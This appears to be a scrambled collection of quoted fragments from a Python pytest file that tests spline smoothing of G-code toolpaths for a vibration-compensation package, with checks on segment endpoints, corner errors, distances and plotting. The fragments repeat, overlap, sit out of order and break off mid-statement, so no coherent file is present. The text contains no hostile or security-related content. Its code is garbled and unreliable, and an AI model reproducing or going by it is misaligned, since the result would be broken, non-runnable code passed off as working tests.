") p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\"",
"elif end == \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert False,",
"== 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") #",
"== 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data,",
"np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10,",
"def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self):",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1,",
"abs=0.1), \\ msg def check_start_point_start(self): msg = \"The start point of the spline",
"linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end,",
"Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"+ np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10",
"x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0],",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter):",
"\"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\"",
"self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point,",
"check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\",",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def",
"corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start, end, True)",
"is not on the middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point,",
"Note that this line is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data,",
"s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50])",
"X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"import * import numpy as np import scipy as sp import vibration_compensation.bokeh_imports as",
"spline, line): msg = \"The spline start distance does not match\" if line",
"does not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12)",
"t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data =",
"that this line is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1,",
"np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l <",
"def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0)",
"test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert",
"10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1)",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0,",
"+ np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data)",
"== pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) ==",
"def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self):",
"the spline segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end ==",
"not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self):",
"l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\",",
"pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1",
"end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"assert self.spline_end > self.spline_mid, \\ \"The endpoint of the corner spline is before",
"np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]),",
"\\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\",
"msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start point of the spline",
"does not match\" if line <= 1.0: line_dist = self.start_line_dist + self.line_length *",
"abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the spline segment is not",
"== \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end ==",
"True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else:",
"l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10",
"assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100,",
"return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def",
"= data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4,",
"abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle",
"if start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end",
"ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def",
"= \"The end point of the spline segment does not match the line",
"def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01)",
"Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data,",
"plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5",
"end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end",
"start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if start ==",
"the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end",
"point): mid = (lineb - linea) * 0.5 + linea return np.linalg.norm(point -",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter):",
"generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100",
"generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data,",
"start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10,",
"np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data)",
"== \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end",
"s, start, end, corner): self.data = data self.s = s self.start = start",
"\"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\",",
"self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the",
"s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that this line",
"not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def",
"not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg",
"and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif",
"abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start point of the",
"== 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data,",
"1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"== \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle()",
"s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1)",
"0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def",
"start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"\"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0,",
"= \"The start point of the spline segment is not on the end",
"np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea,",
"type\" checker.check_continuity() def corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s,",
"checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01)",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10",
"+ np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10,",
"+ np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100",
"check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\"",
"the corner is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <=",
"checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert",
"= generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data",
"1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points",
"ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error)",
"+ np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10",
"check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def",
"s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1)",
"line is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\",",
"test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\"",
"starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\",
"= data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point =",
"of the spline segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end",
"line segment end\" corner_error = \"The closest point of the corner is not",
"!= data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath",
"== pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1],",
"corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\",
"p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb, point):",
"Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data,",
"segment is not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start))",
"start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert",
"if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline",
"the spline segment is not on the middle of the line\" def check_end_point_middle(self):",
"0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1",
"check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2,",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data)",
"== \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end",
"l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"check_start_point_on(self): msg = \"The start point of the spline segment is not on",
"previous segment end distance and the current segment start do not match up\"",
"checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert",
"spline is before the line segment end\" corner_error = \"The closest point of",
"end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg =",
"= self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous segment does not end",
"line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self):",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert",
"test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert",
"pytest from numpy.testing import * import numpy as np import scipy as sp",
"X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert",
"point of the corner is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point -",
"generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert",
"if start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end",
"msg = \"The end point of the spline segment does not match the",
"X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\")",
"filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\"))",
"end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1])",
"self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start point",
"end_error_segment = \"The end point of the spline segment is not on the",
"= SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on()",
"the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0,",
"self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length",
"elif start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start ==",
"Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert",
"== \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\":",
"read_gcode, Data import pytest from numpy.testing import * import numpy as np import",
"before the line segment end\" corner_error = \"The closest point of the corner",
"msg = \"The spline start distance does not match\" if line <= 1.0:",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4,",
"start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end ==",
"s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\")",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter):",
"\"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif",
"msg def check_start_point_start(self): msg = \"The start point of the spline segment does",
"check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\"",
"False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t),",
"self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The",
"l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\",",
"== \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data =",
"\"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end()",
"end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert",
"generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ],",
"== \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\":",
"s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 +",
"abs=1e-12), msg def check_end_point_end(self): msg = \"The end point of the spline segment",
"checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle()",
"== 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data,",
"0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1",
"x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0,",
"l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\",",
"end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid",
"start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\")",
"self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) ==",
"generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"data self.s = s self.start = start self.end = end self.start_point = data.start_xy[l]",
"== 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data)",
"start point of the spline segment is not on the end of the",
"segment end\" corner_error = \"The closest point of the corner is not close",
"scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename =",
"Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data,",
"- 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner:",
"\"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data,",
"abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle point of the",
"pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1",
"end=\"middle\") # Note that this line is very short straight_segment(data, l=1, s=2, start=\"middle\",",
"check_point_on_line(self): msg = \"The middle point of the spline segment is not on",
"X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12)",
"l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\",",
"end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end",
